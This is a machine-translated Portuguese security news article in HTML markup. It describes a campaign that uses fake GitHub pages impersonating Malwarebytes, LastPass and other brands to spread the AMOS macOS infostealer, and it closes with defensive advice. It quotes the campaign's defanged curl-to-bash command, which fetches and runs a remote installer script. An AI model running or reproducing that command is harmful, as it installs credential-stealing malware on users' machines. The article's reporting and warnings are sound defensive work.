Código HTML do Conteúdo

Post: Malware de armamento: o GitHub hospeda malware de malwarebytes, lastpass, Citibank, SentineLone e mais

<div> <div> <p>Uma campanha em larga escala direcionada aos usu&aacute;rios de Mac est&aacute; alavancando as p&aacute;ginas falsas do GitHub para distribuir malware para roubar informa&ccedil;&otilde;es disfar&ccedil;adas de aplicativos leg&iacute;timos populares. </p> <p>Entre os softwares personificados est&atilde;o MalwareBytes para Mac, LastPass, Citibank, SentineLone e dezenas de outras marcas conhecidas. </p> <p>Embora a representa&ccedil;&atilde;o da marca n&atilde;o seja novidade, esta campanha demonstra as t&aacute;ticas em evolu&ccedil;&atilde;o que os cibercriminosos empregam para atrair os usu&aacute;rios a instalar o c&oacute;digo prejudicial.</p> <p>Pesquisadores de amea&ccedil;as da Intelig&ecirc;ncia de amea&ccedil;as do LastPass e Malwarebytes t&ecirc;m<a href="https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware?utm_campaign=brandsocial&amp;utm_medium=social&amp;utm_source=twitter" rel="noreferrer noopener nofollow" target="_blank"> identificado </a>In&uacute;meras p&aacute;ginas do Github pretendem hospedar instaladores de macos para aplicativos confi&aacute;veis. </p> <p>Em v&aacute;rios casos, os invasores compram an&uacute;ncios do Google patrocinados que direcionam os usu&aacute;rios a essas p&aacute;ginas maliciosas, em vez de sites oficiais de fornecedores. </p> <p>Em outros casos, a campanha depende de t&eacute;cnicas de envenenamento por SEO para aumentar os reposit&oacute;rios falsos nos resultados de pesquisa de perguntas como &ldquo;Malwarebytes Github MacOS&rdquo;. Uma vez atra&iacute;do para o site, os usu&aacute;rios involunt&aacute;rios recebem um &ldquo;Get [APPLICATION]&rdquo; bot&atilde;o. </p> <p>Clicar em ele leva a instru&ccedil;&otilde;es que baixam e executam um script do instalador de um dom&iacute;nio rec&eacute;m -registrado, geralmente sem qualquer prompt ou revis&atilde;o de c&oacute;digo do usu&aacute;rio, ignorando efetivamente as prote&ccedil;&otilde;es do MacOS e a vigil&acirc;ncia do usu&aacute;rio.</p> <p>O objetivo desta opera&ccedil;&atilde;o &eacute; implantar o ladr&atilde;o at&ocirc;mico (tamb&eacute;m conhecido como AMOS), um poderoso ladr&atilde;o de informa&ccedil;&otilde;es do MacOS que colhe dados do navegador, conte&uacute;do da &aacute;rea de transfer&ecirc;ncia e credenciais armazenadas. </p> <p>Se algu&eacute;m clicar nesse bot&atilde;o, acabar&aacute; em uma p&aacute;gina de download com instru&ccedil;&otilde;es sobre como instalar o produto falso, que &eacute; realmente um ladr&atilde;o de informa&ccedil;&otilde;es.</p> <p>Ambos os Malwarebytes para Mac e Ameakdown sinalizam e bloqueiam essa variante, mas a engenharia social inicial permanece chocantemente eficaz contra usu&aacute;rios menos cautelosos.</p> <h2 id="technical-breakdown-of-the-infection-chain"><strong>Aparecimento t&eacute;cnico da cadeia de infec&ccedil;&otilde;es</strong></h2> <p>O processo de instala&ccedil;&atilde;o se baseia inteiramente em um comando shell de linha &uacute;nica que os usu&aacute;rios s&atilde;o instru&iacute;dos a copiar e colar em seus <a href="https://gbhackers.com/bluenoroff-macos-users/" rel="noreferrer noopener" target="_blank">macos</a> Terminal:</p> <pre>bash<code>/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)" </code></pre> <p>Aqui est&aacute; como funciona:</p> <ol> <li>O <code>curl -fsSL</code> As op&ccedil;&otilde;es baixam silenciosamente um script remoto, seguindo todos os redirecionamentos e falhando silenciosamente nos erros HTTP.</li> <li>Envolvendo o <code>curl</code> invoca&ccedil;&atilde;o in <code>$(&hellip;)</code> faz com que o script baixado seja passado diretamente para o exterior <code>bash -c</code> comando.</li> <li>A invoca&ccedil;&atilde;o da concha externa executa o script buscado instantaneamente, sem apresentar seu conte&uacute;do ao usu&aacute;rio para revis&atilde;o.</li> </ol> <p>Os atacantes codificaram URLs intermedi&aacute;rios na base64 para ofuscar o verdadeiro destino, dificultando a detec&ccedil;&atilde;o por observadores casuais. </p> <p>Como a abordagem do terminal n&atilde;o aciona as verifica&ccedil;&otilde;es de assinatura de aplicativos do MacOS ou requer instru&ccedil;&otilde;es no n&iacute;vel do administrador, o script &eacute; executado com os privil&eacute;gios do usu&aacute;rio e pode instalar agentes persistentes em Launchagents ou Launchdaemons.</p> <h2 id="best-practices-to-avoid-fake-software"><strong>Melhores pr&aacute;ticas para evitar software falso</strong></h2> <p>Para proteger contra isso e t&aacute;ticas semelhantes, os usu&aacute;rios de Mac devem adotar as seguintes diretrizes:</p> <p>Nunca execute comandos de c&oacute;pia de c&oacute;pia de p&aacute;ginas da web n&atilde;o verificadas, f&oacute;runs ou <a href="https://gbhackers.com/github-notifications/" rel="noreferrer noopener" target="_blank">Github</a> Reposit&oacute;rios. Comandos invocando <code>curl &hellip; | bash</code> ou constru&ccedil;&otilde;es semelhantes devem ser tratadas como alto risco.</p> <p>Sempre fa&ccedil;a o download de aplicativos do site oficial do desenvolvedor ou de uma loja de aplicativos respeit&aacute;vel. Em caso de d&uacute;vida, verifique os URLs do download com o fornecedor diretamente atrav&eacute;s de seus canais de suporte.</p> <p>Desative ou tenha cuidado com os resultados de pesquisa patrocinados. Esses an&uacute;ncios podem redirecionar para p&aacute;ginas maliciosas, mascaradas como marcas confi&aacute;veis.</p> <p>Empregue prote&ccedil;&atilde;o antimalware em tempo real que inclui filtragem na web. Solu&ccedil;&otilde;es como <a href="https://gbhackers.com/malwarebytes-browser-extension/" rel="noreferrer noopener" target="_blank">MalwareBytes</a> Para Mac e Detectar e Bloquear as variantes de ladr&otilde;es at&ocirc;micos antes da instala&ccedil;&atilde;o.</p> <p>Se houver suspeita de infec&ccedil;&atilde;o, inspecione o <code>~/Library/LaunchAgents</code> e <code>/Library/LaunchDaemons</code> Pastas para itens desconhecidos e remova quaisquer entradas suspeitas. </p> <p>Para corre&ccedil;&atilde;o abrangente, considere um macOS completo reinstale e restaurar arquivos apenas de backups limpos conhecidos. Reinicializa todas as senhas da conta e ative a autentica&ccedil;&atilde;o de v&aacute;rios fatores para evitar acesso n&atilde;o autorizado com credenciais roubadas.</p> <p>Embora o GitHub seja geralmente uma plataforma confi&aacute;vel para o software de c&oacute;digo aberto, esta campanha ilustra como os advers&aacute;rios podem armar-o, se passando por marcas leg&iacute;timas. </p> <p>A vigil&acirc;ncia, as pr&aacute;ticas cautelosas de download e a prote&ccedil;&atilde;o robusta dos pontos finais continuam sendo as melhores defesas contra amea&ccedil;as t&atilde;o em r&aacute;pida evolu&ccedil;&atilde;o.</p> <p><strong>Siga -nos<a href="https://news.google.com/publications/CAAqKAgKIiJDQklTRXdnTWFnOEtEV2RpYUdGamEyVnljeTVqYjIwb0FBUAE?hl=en-IN&amp;gl=IN&amp;ceid=IN%3Aen" rel="noreferrer noopener" target="_blank">Google News</a>Assim,<a href="https://www.linkedin.com/company/cyber-threat-intel/" rel="noreferrer noopener" target="_blank">LinkedIn</a>e<a href="https://x.com/The_Cyber_News" rel="noreferrer noopener" target="_blank">X</a>Para obter atualiza&ccedil;&otilde;es instant&acirc;neas e definir GBH como uma fonte preferida em<a href="https://www.google.com/preferences/source?q=https://gbhackers.com/" rel="noreferrer noopener" target="_blank">Google</a>.</strong></p> </div></div>